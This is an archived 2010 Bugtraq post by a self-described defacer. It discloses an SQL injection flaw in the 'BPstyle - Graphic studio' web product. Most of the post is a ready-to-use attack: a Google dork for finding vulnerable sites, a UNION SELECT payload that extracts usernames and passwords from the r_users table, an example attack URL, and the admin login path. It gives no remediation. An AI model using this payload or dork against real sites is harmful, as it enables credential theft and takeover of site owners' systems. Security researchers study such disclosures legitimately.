lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Fri, 30 Apr 2010 02:14:49 -0600 From: md.r00t.defacer@...il.com To: bugtraq@...urityfocus.com Subject: BPstyle - Graphic studio SQL Injection Vulnerabilities #-------------------In The Name Of God------------ # BPstyle - Graphic studio SQL Injection Vulnerabilities ################################### #AUTHOR: md.r00t #Mail: md.r00t.defacer@...il.com #Webstie: www.r00t.gigfa.com # ################################### #Google D0rk: # "Designed and Created by: BPstyle - Graphic studio" # inurl:"/page/sindex.php?plug=" ################################### #Exploit: #--------- # -9999+UNION+SELECT+1,2,group_concat(username,0x3a,pw),4,5,6,7,8,9+from+r_users-- ################################### #Example: # #http://www.Site.com/page/sindex.php?plug=1&aid=- 9999+UNION+SELECT+1,2,group_concat(username,0x3a,pw),4,5,6,7,8,9+from+r_users-- ################################### #Admin Page: #http://www.Site.com/admin ################################### #TNX: #Aria-Security Team (Persian Security Network),Virangar Security Team *****************************************
Powered by blists - more mailing lists